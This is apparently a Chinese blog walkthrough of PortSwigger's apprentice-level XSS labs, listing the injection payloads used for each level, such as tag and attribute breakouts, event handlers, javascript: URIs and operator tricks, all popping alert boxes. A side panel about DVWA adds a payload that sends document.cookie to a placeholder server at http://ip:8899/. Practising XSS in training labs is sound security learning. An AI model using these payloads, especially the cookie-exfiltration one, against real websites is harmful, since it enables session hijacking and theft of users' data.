Postswigger 靶场 XSS 通关

PostSwigger靶场XSS通关

靶场地址:All labs | Web Security Academy (portswigger.net)

学徒:第一关

<script>alert(/wuhu/)</script>

image-20230826114131596

image-20230826114056603

学徒:第二关

在页面上没有输入框,进入到博客中查看。

在博客的留言版中输入我们的攻击代码

<script>alert(/wuhu/)</script>

image-20230826143357901

点击返回博客

image-20230826143413810

成功弹框

image-20230826143421127

学徒:第三关

输入攻击代码查看页面反应

<script>alert(/wuhu/)</script>

image-20230826144805799

发现我们的攻击代码被传递到了img标签中,这里我们可以尝试将该标签闭合。

构造攻击代码:

"> <script>alert(/wuhu/)</script>

image-20230826144915096

学徒:第四关

输入参数查看页面反应

wuhu

image-20230826150215300

页面没有任何响应,查看网页源代码

image-20230826150101632

发现我们的攻击代码被传入到了一个span标签中,构造攻击代码

<script>alert(/wuhu/)</script>

页面还是没有弹窗,怀疑这里将script标签过滤了

image-20230826150328096

重新构造攻击代码

<img src='#' onerror='alert(/wuhu/)'>
<img src='#' onclick='alert(/wuhu/)'>

image-20230826151451280

学徒:第五关

发现页面中多了一个提交反馈

image-20230826153720896

进入到提交反馈页面

image-20230826153814013

在message中输入构造的攻击代码

<script>alert(/wuhu/)</script>

发现页面没有任何反应,查看页面提示

image-20230826153942439

这里让我们更改href属性。没什么思路,查看一下页面源代码

image-20230826154055443

观察发现,参数returnPath的值会回显到href属性中,底下的script中的代码也验证了。

image-20230826154210528

image-20230826154219533

构造我们的攻击代码

javascript:alert(/wuhu/)

image-20230826154349063

image-20230826154417823

学徒:第六关

学徒:第七关

在输入框输入攻击代码,观察页面反应

<script>alert(/wuhu/)</script>

image-20230826155602724页面将我们输入的攻击代码传递到了input标签的value参数中。

image-20230826155639226

这里我们可以将value参数闭合,然后添加一个响应事件。

构造我们的攻击代码:

" onmouseover = 'alert(/wuhu/)'

image-20230826155440023

学徒:第八关

第八关的提示

image-20230826155951718

提示我们需要提交一个评论,然后在点击评论作者名称的时候调用报警函数。

先提交一个普通的攻击代码查看页面反应。

<script>alert(/wuhu/)</script>

image-20230826160253854

找到了注入点位置,在a标签的href中,那么我们就可以构造攻击代码了,这里采用伪协议的方式,在Website中来构造攻击代码

javascript:alert('http://')

image-20230826160426651

然后点击我们的提交评论的名字即可弹框。

image-20230826160652359

学徒:第九关

输入基础攻击代码,查看页面响应

<script>alert(/wuhu/)</script>

image-20230826165426360

查看页面源代码发现尖括号,反斜杠,单引号,双引号已经被编码了。

那么可以使用中划线/减号,也就是说减号两边的对象也是会先作为js执行,毕竟要先得到两边的值才能进行算数计算。

'-alert(666)-'

因此除了减号,其他数学运算符号和位运算符号也可以,后面绕过XSS的思路就更多了。

'+alert(1)+'
'/alert(1)/'
'%alert(1)%'
'*alert(1)*'
'^alert(1)^'
'>>alert(1)>>'
'<<alert(1)<<'
'<alert(1)<'
'>alert(1)>'
'==alert(1)=='
  • 20
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA(Damn Vulnerable Web Application)是一个用于测试和练习Web应用程序安全漏洞的靶场XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,攻击者通过注入恶意脚本代码,使得网站在用户端执行这些脚本,从而获取用户敏感信息或进行其他攻击行为。 为了在DVWA靶场中完成XSS通关,你可以尝试以下步骤: 1. 注入脚本:在输入框或者参数中注入恶意脚本代码,比如上面提到的payload,如<img src=x οnerrοr=document.write('<img src="http://ip:8899/' document.cookie '"/>')>。 2. 触发脚本执行:提交注入的脚本,使得网站后端将其返回到前端,并在用户端执行。 3. 获取结果:当脚本执行时,它会将用户的Cookie数据发送到指定的服务器上(http://ip:8899/)。 请注意,这是一种漏洞攻击示例,请在授权范围内使用,并遵循道德规范。在实际应用中,网站开发人员应该采取相应的安全措施来防止XSS攻击,例如输入验证、输出编码等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [DVWA通关--反射型XSSXSS (Reflected))](https://blog.csdn.net/elephantxiang/article/details/111146085)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [DVWA靶场xss通关笔记,详解带截图](https://blog.csdn.net/AboutLzs/article/details/123631604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值